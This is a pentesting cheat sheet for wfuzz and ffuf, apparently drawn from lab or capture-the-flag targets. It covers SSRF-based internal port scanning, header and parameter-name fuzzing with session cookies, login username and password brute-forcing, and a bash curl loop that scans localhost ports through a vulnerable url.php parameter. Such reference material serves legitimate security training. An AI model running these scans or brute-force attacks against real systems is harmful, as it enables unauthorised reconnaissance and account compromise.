FUZZ
See the Web Enumeration page for directory brute-forcing.
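# Show help for the -z payload option (payload types such as range and file).
wfuzz -z help
# Substitute FUZZ with every port 1-65535 (-c: coloured output).
# The URL is quoted so the shell never treats '?' as a glob.
wfuzz -c -z range,1-65535 'http://10.129.1.117:60000/url.php?path=http://localhost:FUZZ'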
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
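# Same scan, hiding every response that has exactly 2 lines (--hl 2), i.e. the baseline reply.
# The URL is quoted so the shell never treats '?' as a glob.
wfuzz -c -z range,1-65535 --hl 2 'http://10.129.1.117:60000/url.php?path=http://localhost:FUZZ'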
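# Fuzz request header names from a wordlist of HTTP header fields; each candidate
# is sent as "<name>: Control_internal_IP" via -H.
# NOTE(review): --hh expects a numeric character count (see --hc/hl/hw/hh above);
# "89chars" reads like a placeholder for the baseline response length — confirm.
# "$IP" is quoted so an empty or space-containing value cannot break the URL word.
wfuzz -c -w /usr/share/seclists/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt -u "http://${IP}/admin.php" -H "FUZZ: Control_internal_IP" --hh 89chars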
# Fuzz GET parameter names
### Fuzzing with custom headers (`-H`)
# Fuzz the GET parameter name while passing the session cookie as a raw header;
# --hh 1678 hides responses whose size equals the baseline.
wfuzz -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -H 'Cookie: PHPSESSID=5b81mitco4j6hgiljr9euhqj1c' --hh 1678 -u 'https://streamio.htb/admin/?FUZZ='
### Fuzzing with cookies (`-b`)
# Same parameter-name fuzz, but the cookie is supplied with -b instead of a raw header;
# --hh 1678 hides responses whose size equals the baseline.
wfuzz -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -b 'PHPSESSID=5b81mitco4j6hgiljr9euhqj1c' --hh 1678 -u 'https://streamio.htb/admin/?FUZZ='
`-d` sends the payload as POST body data:
# POST the names from names.txt as the username field; --hh 7074 hides the baseline-sized reply.
wfuzz -c --hh 7074 -z file,names.txt -d 'username=FUZZ&password=whatev' http://10.129.1.83/login.php
Brute-force credentials (two payloads: `FUZZ` for the first list, `FUZ2Z` for the second):
# First -z feeds FUZZ, second -z feeds FUZ2Z; --hs hides responses containing the failure string.
wfuzz -c -u http://10.10.33.144/login.php -d 'username=FUZZ&password=FUZ2Z' --hs 'Please enter the correct credentials' -z file,usernames.txt -z file,passwords.txt
# ffuf equivalent of the cookie-based parameter fuzz; -fs 1678 filters out baseline-sized responses.
ffuf -u 'https://streamio.htb/admin/?FUZZ=' -b 'PHPSESSID=5b81mitco4j6hgiljr9euhqj1c' -fs 1678 -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt
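#!/bin/bash
# Request url.php?path=http://localhost:<port> for every port 0-65535 and, for
# each port whose response body is non-empty, print "<port>: " followed by the
# first 100 characters of the body collapsed onto one line.
set -u

# Base URL; the port number is appended after "localhost:".
base_url='http://10.129.1.117:60000/url.php?path=http://localhost:'

for i in {0..65535}; do
  # -s: no progress meter. A failed request yields an empty body, which the
  # word count below treats as "no response". (No set -e: curl failing on a
  # closed port must not abort the loop.)
  res=$(curl -s -- "${base_url}${i}")
  # Quoted: the original unquoted echo would glob-expand any '*' or '?' in HTML.
  len=$(printf '%s' "$res" | wc -w)
  if (( len > 0 )); then
    printf '%s: ' "$i"
    # Collapse all whitespace (including CR/LF) to single spaces, then truncate.
    # This keeps the original one-line preview without relying on word-splitting.
    printf '%s\n' "$res" | tr -s '[:space:]' ' ' | cut -c-100
    printf '\n'
  fi
done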